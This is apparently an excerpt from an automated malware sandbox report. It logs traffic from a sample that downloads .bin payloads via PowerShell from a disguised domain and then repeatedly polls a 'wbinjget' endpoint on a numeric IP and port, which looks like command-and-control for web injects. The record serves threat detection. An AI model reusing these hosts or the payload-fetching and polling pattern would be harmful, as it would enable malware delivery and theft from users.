Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.com

Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.147.124.236

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004D29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

11_2_004D29BA

Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/0912545164/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.com
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: pict.healthclinic-stylemaven.com

Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002D64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000
